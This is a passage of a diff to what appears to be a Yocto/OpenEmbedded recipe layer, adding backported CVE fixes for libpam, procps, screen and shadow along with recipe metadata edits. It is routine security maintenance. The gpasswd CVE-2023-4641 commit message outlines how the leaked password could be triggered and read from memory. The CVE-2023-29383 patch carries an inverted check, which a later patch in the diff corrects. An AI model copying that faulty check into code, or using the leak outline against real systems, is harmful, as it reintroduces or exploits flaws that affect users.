            file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \
            file://include_sysmacros.patch \
            file://0001-mdadm-skip-test-11spare-migration.patch \
+           file://CVE-2023-28736.patch \
+           file://CVE-2023-28938.patch \
            "
 
 SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598"
diff --git a/meta/recipes-extended/mingetty/mingetty_1.08.bb b/meta/recipes-extended/mingetty/mingetty_1.08.bb
index 491b892093..9822e86b0e 100644
--- a/meta/recipes-extended/mingetty/mingetty_1.08.bb
+++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Compact getty terminal handler for virtual consoles only"
 SECTION = "console/utils"
 HOMEPAGE = "http://sourceforge.net/projects/mingetty/"
+DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app."
 LICENSE = "GPLv2"
 PR = "r3"
 
diff --git a/meta/recipes-extended/minicom/minicom_2.7.1.bb b/meta/recipes-extended/minicom/minicom_2.7.1.bb
index 6c539c553b..79d06d20f9 100644
--- a/meta/recipes-extended/minicom/minicom_2.7.1.bb
+++ b/meta/recipes-extended/minicom/minicom_2.7.1.bb
@@ -26,3 +26,5 @@ do_install() {
 }
 
 RRECOMMENDS_${PN} += "lrzsz"
+
+RDEPENDS_${PN} += "ncurses-terminfo-base"
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb
index 88b4cf4a03..3d35a17c92 100644
--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
 
 S = "${WORKDIR}/newt-${PV}"
 
-inherit autotools-brokensep python3native python3-dir
+inherit autotools-brokensep python3native python3-dir python3targetconfig
 
 EXTRA_OECONF = "--without-tcl --with-python"
 
diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
new file mode 100644
index 0000000000..33ac37b7f0
--- /dev/null
+++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
@@ -0,0 +1,59 @@
+From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <matthias.gerstner@suse.de>
+Date: Wed, 27 Dec 2023 14:01:59 +0100
+Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent
+ local DoS situations
+
+Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs
+being placed in user controlled directories, causing the PAM module to
+block indefinitely during `openat()`.
+
+Pass O_DIRECTORY to cause the `openat()` to fail if the path does not
+refer to a directory.
+
+With this the check whether the final path element is a directory
+becomes unnecessary, drop it.
+
+Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb]
+CVE: CVE-2024-22365
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ modules/pam_namespace/pam_namespace.c | 18 +-----------------
+ 1 file changed, 1 insertion(+), 17 deletions(-)
+
+diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c
+index 2528cff86..f72d67189 100644
+--- a/modules/pam_namespace/pam_namespace.c
++++ b/modules/pam_namespace/pam_namespace.c
+@@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ 	int dfd = AT_FDCWD;
+ 	int dfd_next;
+ 	int save_errno;
+-	int flags = O_RDONLY;
++	int flags = O_RDONLY | O_DIRECTORY;
+ 	int rv = -1;
+ 	struct stat st;
+ 
+@@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ 		rv = openat(dfd, dir, flags);
+ 	}
+ 
+-	if (rv != -1) {
+-		if (fstat(rv, &st) != 0) {
+-			save_errno = errno;
+-			close(rv);
+-			rv = -1;
+-			errno = save_errno;
+-			goto error;
+-		}
+-		if (!S_ISDIR(st.st_mode)) {
+-			close(rv);
+-			errno = ENOTDIR;
+-			rv = -1;
+-			goto error;
+-		}
+-	}
+-
+ 	if (flags & O_NOFOLLOW) {
+ 		/* we are inside user-owned dir - protect */
+ 		if (protect_mount(rv, p, idata) == -1) {
diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb
index bc72afe6ad..527a368e2d 100644
--- a/meta/recipes-extended/pam/libpam_1.3.1.bb
+++ b/meta/recipes-extended/pam/libpam_1.3.1.bb
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux
            file://pam-security-abstract-securetty-handling.patch \
            file://pam-unix-nullok-secure.patch \
            file://crypt_configure.patch \
+           file://CVE-2024-22365.patch \
           "
 
 SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165"
diff --git a/meta/recipes-extended/parted/parted_3.3.bb b/meta/recipes-extended/parted/parted_3.3.bb
index 1cfd9ec264..2d688c3700 100644
--- a/meta/recipes-extended/parted/parted_3.3.bb
+++ b/meta/recipes-extended/parted/parted_3.3.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Disk partition editing/resizing utility"
 HOMEPAGE = "http://www.gnu.org/software/parted/parted.html"
+DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging."
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c"
 SECTION = "console/tools"
@@ -22,7 +23,7 @@ EXTRA_OECONF = "--disable-device-mapper"
 
 inherit autotools pkgconfig gettext texinfo ptest
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
 
 do_compile_ptest() {
 	oe_runmake -C tests print-align print-max dup-clobber duplicate fs-resize print-flags
diff --git a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
index 9f992d3e83..409a8f3896 100644
--- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
+++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
@@ -1,5 +1,7 @@
 SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library"
 SECTION = "libs"
+HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27"
+DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions."
 LICENSE = "Artistic-1.0 | GPL-1.0+"
 LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f"
 
diff --git a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
index 7219c7d11e..068f0bd3f3 100644
--- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
+++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Perl modules useful for manipulating date and time information"
 HOMEPAGE = "https://metacpan.org/release/TimeDate"
+DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later."
 SECTION = "libs"
 # You can redistribute it and/or modify it under the same terms as Perl itself.
 LICENSE = "Artistic-1.0 | GPL-1.0+"
diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
new file mode 100644
index 0000000000..50582a8649
--- /dev/null
+++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
@@ -0,0 +1,85 @@
+From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001
+From: Craig Small <csmall@dropbear.xyz>
+Date: Thu, 10 Aug 2023 21:18:38 +1000
+Subject: [PATCH] ps: Fix possible buffer overflow in -C option
+
+ps allocates memory using malloc(length of arg * len of struct).
+In certain strange circumstances, the arg length could be very large
+and the multiplecation will overflow, allocating a small amount of
+memory.
+
+Subsequent strncpy() will then write into unallocated memory.
+The fix is to use calloc. It's slower but this is a one-time
+allocation. Other malloc(x * y) calls have also been replaced
+by calloc(x, y)
+
+References:
+ https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016
+ https://nvd.nist.gov/vuln/detail/CVE-2023-4016
+ https://gitlab.com/procps-ng/procps/-/issues/297
+ https://bugs.debian.org/1042887
+
+Signed-off-by: Craig Small <csmall@dropbear.xyz>
+
+CVE: CVE-2023-4016
+Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ NEWS        | 1 +
+ ps/parser.c | 8 ++++----
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/NEWS b/NEWS
+index b9509734..64fa3da8 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,3 +1,5 @@
++  * ps: Fix buffer overflow in -C option CVE-2023-4016     Debian #1042887, issue #297
++
+ procps-ng-3.3.16
+ ----------------
+   * library: Increment to 8:2:0
+diff --git a/ps/parser.c b/ps/parser.c
+index 248aa741..15873dfa 100644
+--- a/ps/parser.c
++++ b/ps/parser.c
+@@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+   const char *err;       /* error code that could or did happen */
+   /*** prepare to operate ***/
+   node = malloc(sizeof(selection_node));
+-  node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */
+   node->n = 0;
+   buf = strdup(arg);
+   /*** sanity check and count items ***/
+@@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+   } while (*++walk);
+   if(need_item) goto parse_error;
+   node->n = items;
++  node->u = calloc(items, sizeof(sel_union));
+   /*** actually parse the list ***/
+   walk = buf;
+   while(items--){
+@@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){
+   thisarg = ps_argc - 1;   /* we must be at the end now */
+ 
+   pidnode = malloc(sizeof(selection_node));
+-  pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++  pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+   pidnode->n = 0;
+ 
+   grpnode = malloc(sizeof(selection_node));
+-  grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++  grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */
+   grpnode->n = 0;
+ 
+   sidnode = malloc(sizeof(selection_node));
+-  sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++  sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+   sidnode->n = 0;
+ 
+   while(i--){
+-- 
+GitLab
+
diff --git a/meta/recipes-extended/procps/procps_3.3.16.bb b/meta/recipes-extended/procps/procps_3.3.16.bb
index 2810ebd285..ac27734a6f 100644
--- a/meta/recipes-extended/procps/procps_3.3.16.bb
+++ b/meta/recipes-extended/procps/procps_3.3.16.bb
@@ -12,8 +12,9 @@ DEPENDS = "ncurses"
 
 inherit autotools gettext pkgconfig update-alternatives
 
-SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \
+SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
            file://sysctl.conf \
+           file://CVE-2023-4016.patch \
            "
 SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f"
 
diff --git a/meta/recipes-extended/psmisc/psmisc_23.3.bb b/meta/recipes-extended/psmisc/psmisc_23.3.bb
index e569f1074b..36e6775f9e 100644
--- a/meta/recipes-extended/psmisc/psmisc_23.3.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb
@@ -2,7 +2,7 @@ require psmisc.inc
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
 
-SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \
+SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
            file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
            "
 SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772"
diff --git a/meta/recipes-extended/quota/quota_4.05.bb b/meta/recipes-extended/quota/quota_4.05.bb
index c5da1e71ed..46ad7352d6 100644
--- a/meta/recipes-extended/quota/quota_4.05.bb
+++ b/meta/recipes-extended/quota/quota_4.05.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem"
 SECTION = "base"
 HOMEPAGE = "http://sourceforge.net/projects/linuxquota/"
+DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel"
 BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136"
 LICENSE = "BSD & GPLv2+ & LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \
diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
index cb5b288c48..0f8a6f74f8 100644
--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}"
 
 SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c"
 
-SRC_URI = "git://github.com/thkukuk/${BPN} \
+SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
            file://0001-Use-cross-compiled-rpcgen.patch \
           "
 
diff --git a/meta/recipes-extended/screen/screen/CVE-2021-26937.patch b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
new file mode 100644
index 0000000000..983b35c1b0
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
@@ -0,0 +1,68 @@
+Description: [CVE-2021-26937] Fix out of bounds array access
+Author: Michael Schröder <mls@suse.de>
+Bug-Debian: https://bugs.debian.org/982435
+Bug: https://savannah.gnu.org/bugs/?60030
+Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
+Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3
+Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html
+
+CVE: CVE-2021-26937
+Upstream-Status: Pending
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+--- a/encoding.c
++++ b/encoding.c
+@@ -43,7 +43,7 @@
+ # ifdef UTF8
+ static int   recode_char __P((int, int, int));
+ static int   recode_char_to_encoding __P((int, int));
+-static void  comb_tofront __P((int, int));
++static void  comb_tofront __P((int));
+ #  ifdef DW_CHARS
+ static int   recode_char_dw __P((int, int *, int, int));
+ static int   recode_char_dw_to_encoding __P((int, int *, int));
+@@ -1263,6 +1263,8 @@
+     {0x30000, 0x3FFFD},
+   };
+ 
++  if (c >= 0xdf00 && c <= 0xdfff)
++    return 1;          /* dw combining sequence */
+   return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) ||
+           (cjkwidth &&
+            bisearch(c, ambiguous,
+@@ -1330,11 +1332,12 @@
+ }
+ 
+ static void
+-comb_tofront(root, i)
+-int root, i;
++comb_tofront(i)
++int i;
+ {
+   for (;;)
+     {
++      int root = i >= 0x700 ? 0x801 : 0x800;
+       debug1("bring to front: %x\n", i);
+       combchars[combchars[i]->prev]->next = combchars[i]->next;
+       combchars[combchars[i]->next]->prev = combchars[i]->prev;
+@@ -1396,9 +1399,9 @@
+     {
+       /* full, recycle old entry */
+       if (c1 >= 0xd800 && c1 < 0xe000)
+-        comb_tofront(root, c1 - 0xd800);
++        comb_tofront(c1 - 0xd800);
+       i = combchars[root]->prev;
+-      if (c1 == i + 0xd800)
++      if (i == 0x800 || i == 0x801 || c1 == i + 0xd800)
+ 	{
+ 	  /* completely full, can't recycle */
+ 	  debug("utf8_handle_comp: completely full!\n");
+@@ -1422,7 +1425,7 @@
+   mc->font  = (i >> 8) + 0xd8;
+   mc->fontx = 0;
+   debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800);
+-  comb_tofront(root, i);
++  comb_tofront(i);
+ }
+ 
+ #else /* !UTF8 */
diff --git a/meta/recipes-extended/screen/screen/CVE-2023-24626.patch b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
new file mode 100644
index 0000000000..73caf9d81b
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
@@ -0,0 +1,40 @@
+From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001
+From: Alexander Naumov <alexander_naumov@opensuse.org>
+Date: Mon, 30 Jan 2023 17:22:25 +0200
+Subject: fix: missing signal sending permission check on failed query messages
+
+Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org>
+
+CVE: CVE-2023-24626
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ socket.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/socket.c b/socket.c
+index bb68b35..9d87445 100644
+--- a/socket.c
++++ b/socket.c
+@@ -1285,11 +1285,16 @@ ReceiveMsg()
+           else
+             queryflag = -1;
+ 
+-          Kill(m.m.command.apid,
++          if (CheckPid(m.m.command.apid)) {
++            Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid);
++          }
++          else {
++            Kill(m.m.command.apid,
+                (queryflag >= 0)
+                    ? SIGCONT
+                    : SIG_BYE); /* Send SIG_BYE if an error happened */
+-          queryflag = -1;
++            queryflag = -1;
++          }
+         }
+         break;
+       case MSG_COMMAND:
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/screen/screen_4.8.0.bb b/meta/recipes-extended/screen/screen_4.8.0.bb
index 4772eb6c7a..c4faa27023 100644
--- a/meta/recipes-extended/screen/screen_4.8.0.bb
+++ b/meta/recipes-extended/screen/screen_4.8.0.bb
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \
            file://0002-comm.h-now-depends-on-term.h.patch \
            file://0001-fix-for-multijob-build.patch \
            file://0001-Remove-more-compatibility-stuff.patch \
+           file://CVE-2021-26937.patch \
+           file://CVE-2023-24626.patch \
           "
 
 SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e"
diff --git a/meta/recipes-extended/sed/sed_4.8.bb b/meta/recipes-extended/sed/sed_4.8.bb
index 39e3a61df5..089bd11a55 100644
--- a/meta/recipes-extended/sed/sed_4.8.bb
+++ b/meta/recipes-extended/sed/sed_4.8.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Stream EDitor (text filtering utility)"
 HOMEPAGE = "http://www.gnu.org/software/sed/"
+DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor."
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \
                     file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \
diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
new file mode 100644
index 0000000000..aea07ff361
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
@@ -0,0 +1,66 @@
+From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com>
+Date: Fri, 31 Mar 2023 14:46:50 +0200
+Subject: [PATCH] Overhaul valid_field()
+
+e5905c4b ("Added control character check") introduced checking for
+control characters but had the logic inverted, so it rejects all
+characters that are not control ones.
+
+Cast the character to `unsigned char` before passing to the character
+checking functions to avoid UB.
+
+Use strpbrk(3) for the illegal character test and return early.
+
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index fb51b582..53929248 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal)
+ 
+ 	/* For each character of field, search if it appears in the list
+ 	 * of illegal characters. */
++	if (illegal && NULL != strpbrk (field, illegal)) {
++		return -1;
++	}
++
++	/* Search if there are non-printable or control characters */
+ 	for (cp = field; '\0' != *cp; cp++) {
+-		if (strchr (illegal, *cp) != NULL) {
++		unsigned char c = *cp;
++		if (!isprint (c)) {
++			err = 1;
++		}
++		if (iscntrl (c)) {
+ 			err = -1;
+ 			break;
+ 		}
+ 	}
+ 
+-	if (0 == err) {
+-		/* Search if there are non-printable or control characters */
+-		for (cp = field; '\0' != *cp; cp++) {
+-			if (!isprint (*cp)) {
+-				err = 1;
+-			}
+-			if (!iscntrl (*cp)) {
+-				err = -1;
+-				break;
+-			}
+-		}
+-	}
+-
+ 	return err;
+ }
+ 
+-- 
+2.34.1
+
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-29383.patch b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
new file mode 100644
index 0000000000..dbf4a508e9
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
@@ -0,0 +1,54 @@
+From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001
+From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com>
+Date: Thu, 23 Mar 2023 23:39:38 +0000
+Subject: [PATCH] Added control character check
+
+Added control character check, returning -1 (to "err") if control characters are present.
+
+CVE: CVE-2023-29383
+Upstream-Status: Backport
+
+Reference to upstream:
+https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 11 +++++++----
+ 1 file changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index 640be931..fb51b582 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -21,9 +21,9 @@
+  *
+  * The supplied field is scanned for non-printable and other illegal
+  * characters.
+- *  + -1 is returned if an illegal character is present.
+- *  +  1 is returned if no illegal characters are present, but the field
+- *       contains a non-printable character.
++ *  + -1 is returned if an illegal or control character is present.
++ *  +  1 is returned if no illegal or control characters are present,
++ *       but the field contains a non-printable character.
+  *  +  0 is returned otherwise.
+  */
+ int valid_field (const char *field, const char *illegal)
+@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal)
+ 	}
+ 
+ 	if (0 == err) {
+-		/* Search if there are some non-printable characters */
++		/* Search if there are non-printable or control characters */
+ 		for (cp = field; '\0' != *cp; cp++) {
+ 			if (!isprint (*cp)) {
+ 				err = 1;
++			}
++			if (!iscntrl (*cp)) {
++				err = -1;
+ 				break;
+ 			}
+ 		}
+-- 
+2.34.1
+
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
new file mode 100644
index 0000000000..75dbbad299
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
@@ -0,0 +1,146 @@
+From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001
+From: Alejandro Colomar <alx@kernel.org>
+Date: Sat, 10 Jun 2023 16:20:05 +0200
+Subject: [PATCH] gpasswd(1): Fix password leak
+
+CVE: CVE-2023-4641
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904]
+
+How to trigger this password leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When gpasswd(1) asks for the new password, it asks twice (as is usual
+for confirming the new password).  Each of those 2 password prompts
+uses agetpass() to get the password.  If the second agetpass() fails,
+the first password, which has been copied into the 'static' buffer
+'pass' via STRFCPY(), wasn't being zeroed.
+
+agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and
+can fail for any of the following reasons:
+
+-  malloc(3) or readpassphrase(3) failure.
+
+   These are going to be difficult to trigger.  Maybe getting the system
+   to the limits of memory utilization at that exact point, so that the
+   next malloc(3) gets ENOMEM, and possibly even the OOM is triggered.
+   About readpassphrase(3), ENFILE and EINTR seem the only plausible
+   ones, and EINTR probably requires privilege or being the same user;
+   but I wouldn't discard ENFILE so easily, if a process starts opening
+   files.
+
+-  The password is longer than PASS_MAX.
+
+   The is plausible with physical access.  However, at that point, a
+   keylogger will be a much simpler attack.
+
+And, the attacker must be able to know when the second password is being
+introduced, which is not going to be easy.
+
+How to read the password after the leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Provoking the leak yourself at the right point by entering a very long
+password is easy, and inspecting the process stack at that point should
+be doable.  Try to find some consistent patterns.
+
+Then, search for those patterns in free memory, right after the victim
+leaks their password.
+
+Once you get the leak, a program should read all the free memory
+searching for patterns that gpasswd(1) leaves nearby the leaked
+password.
+
+On 6/10/23 03:14, Seth Arnold wrote:
+> An attacker process wouldn't be able to use malloc(3) for this task.
+> There's a handful of tools available for userspace to allocate memory:
+>
+> -  brk / sbrk
+> -  mmap MAP_ANONYMOUS
+> -  mmap /dev/zero
+> -  mmap some other file
+> -  shm_open
+> -  shmget
+>
+> Most of these return only pages of zeros to a process.  Using mmap of an
+> existing file, you can get some of the contents of the file demand-loaded
+> into the memory space on the first use.
+>
+> The MAP_UNINITIALIZED flag only works if the kernel was compiled with
+> CONFIG_MMAP_ALLOW_UNINITIALIZED.  This is rare.
+>
+> malloc(3) doesn't zero memory, to our collective frustration, but all the
+> garbage in the allocations is from previous allocations in the current
+> process.  It isn't leftover from other processes.
+>
+> The avenues available for reading the memory:
+> -  /dev/mem and /dev/kmem (requires root, not available with Secure Boot)
+> -  /proc/pid/mem (requires ptrace privileges, mediated by YAMA)
+> -  ptrace (requires ptrace privileges, mediated by YAMA)
+> -  causing memory to be swapped to disk, and then inspecting the swap
+>
+> These all require a certain amount of privileges.
+
+How to fix it?
+~~~~~~~~~~~~~~
+
+memzero(), which internally calls explicit_bzero(3), or whatever
+alternative the system provides with a slightly different name, will
+make sure that the buffer is zeroed in memory, and optimizations are not
+allowed to impede this zeroing.
+
+This is not really 100% effective, since compilers may place copies of
+the string somewhere hidden in the stack.  Those copies won't get zeroed
+by explicit_bzero(3).  However, that's arguably a compiler bug, since
+compilers should make everything possible to avoid optimizing strings
+that are later passed to explicit_bzero(3).  But we all know that
+sometimes it's impossible to have perfect knowledge in the compiler, so
+this is plausible.  Nevertheless, there's nothing we can do against such
+issues, except minimizing the time such passwords are stored in plain
+text.
+
+Security concerns
+~~~~~~~~~~~~~~~~~
+
+We believe this isn't easy to exploit.  Nevertheless, and since the fix
+is trivial, this fix should probably be applied soon, and backported to
+all supported distributions, to prevent someone else having more
+imagination than us to find a way.
+
+Affected versions
+~~~~~~~~~~~~~~~~~
+
+All.  Bug introduced in shadow 19990709.  That's the second commit in
+the git history.
+
+Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)")
+Reported-by: Alejandro Colomar <alx@kernel.org>
+Cc: Serge Hallyn <serge@hallyn.com>
+Cc: Iker Pedrosa <ipedrosa@redhat.com>
+Cc: Seth Arnold <seth.arnold@canonical.com>
+Cc: Christian Brauner <christian@brauner.io>
+Cc: Balint Reczey <rbalint@debian.org>
+Cc: Sam James <sam@gentoo.org>
+Cc: David Runge <dvzrv@archlinux.org>
+Cc: Andreas Jaeger <aj@suse.de>
+Cc: <~hallyn/shadow@lists.sr.ht>
+Signed-off-by: Alejandro Colomar <alx@kernel.org>
+Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com>
+---
+ src/gpasswd.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/gpasswd.c b/src/gpasswd.c
+index 4d75af96..a698b32a 100644
+--- a/src/gpasswd.c
++++ b/src/gpasswd.c
+@@ -918,6 +918,7 @@ static void change_passwd (struct group *gr)
+ 		strzero (cp);
+ 		cp = getpass (_("Re-enter new password: "));
+ 		if (NULL == cp) {
++			memzero (pass, sizeof pass);
+ 			exit (1);
+ 		}
+ 
+-- 
+2.42.0
+
diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
index 5f7ea00bf1..4e68f826c6 100644
--- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
+++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass"
 HOMEPAGE = "http://github.com/shadow-maint/shadow"
 BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
 SECTION = "base utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
